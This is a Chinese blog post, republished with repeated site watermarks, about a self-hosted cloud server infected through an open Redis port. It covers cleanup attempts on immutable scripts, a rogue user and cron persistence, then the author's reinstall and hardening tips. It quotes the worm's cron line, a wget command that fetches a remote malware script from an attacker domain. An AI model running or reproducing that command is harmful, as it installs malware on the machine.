>>病毒后果<<
- 使用top & ps & netstat 等等命令,都无法正常使用
- CPU基本100%,时不时网络中断
- redis端口6379被大规则线程占用
- 通过lsof -i:6379 查看进程,发现进程id一直在变动
- rm -rf 攻击的脚本,显示没权限
>>温馨提示<<文章源自玩技e族-https://www.playezu.com/134168.html
- 最终因为被感染的文件实在太多,只能重装系统。尽管删除了核心的攻击脚本,但是很多脚本命令也被破坏了。
- 如果整个排查过程对你有帮助,请继续看,如果你想彻底解决掉,可以关闭此页面了。
>>查询结果<<文章源自玩技e族-https://www.playezu.com/134168.html
文章源自玩技e族-https://www.playezu.com/134168.html
>>删除进程<<文章源自玩技e族-https://www.playezu.com/134168.html
发现pnscan相关进程,全部kill,查询占用名字whereis然后删除/usr/local/bin目录下的pnscan脚本。文章源自玩技e族-https://www.playezu.com/134168.html
>>查找用户<<文章源自玩技e族-https://www.playezu.com/134168.html
然后通过/var/log查看日志,系统莫名注册了个vtab的系统用户,而且系统用户全部权限都被篡改也无法删除。文章源自玩技e族-https://www.playezu.com/134168.html
[root@localhost /]# userdel -r vtab
>>文件权限<<文章源自玩技e族-https://www.playezu.com/134168.html
这个蠕虫脚本写的那是非常不错的,逻辑缜密清晰,高手!不管三七二十一,分清了敌我,然后开始全面kill相关进程以及清除相关脚本和其他文件;另外,updata.sh/sysupdata.sh等这些脚本直接rm无法清除掉,因为这些文件都包含了i属性,使用指令lsattr 文件名可查看文件属性,如下:文章源自玩技e族-https://www.playezu.com/134168.html
[root@JD etc]# lsattr updata.sh ----i----------- updata.sh
知道原因后就好办了,执行指令chattr -i 文件名,更改文件i属性,如下文章源自玩技e族-https://www.playezu.com/134168.html
[root@JD etc]# chattr -i updata.sh
还是没什么用仍然显示没权限。
>>定时任务<<
删除后重启服务器还是,删除的脚本文件又重新安装运行回来了,查看了定时任务,发现定时任务也被修改了,原来一直在执行下载和更新脚本的代码。而且一直无法删除这项定时任务。
wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh
>>寻找阿里<<
无奈向阿里云发起工单,也没什么号的结果办法,只能备份系统盘后重新初始化,然后再通过快照的方式挂载到新的系统中。
>>排查总结<<
如果想彻底解决这个毒瘤,需要恢复的内容很多、且需要完全把攻击的脚本看懂,否者也不能彻底恢复
想想本人能力还有限 ,有这个时间,不如重新安装一个系统。
此服务器个人学习使用,安全问题自己关注的很少。至少任何服务开启的时候,以后都要设置密码!!
如果可以,防火墙设置固定的IP地址访问的权限、常用的端口,如80/3306/6379等等,可以设置其他非默认端口。
有时间大致研究下附录脚本,发现自己与大神的距离有多远,不学习只能被虐了!学习动力瞬间up,up,up
>>安全加固<<
使用了证书登录方式,加强的安全组策略,6379的端口不开放,添加了sql防注入机制,添加了服务器登录通知,添加了ddos防止被攻击瘫痪。
评论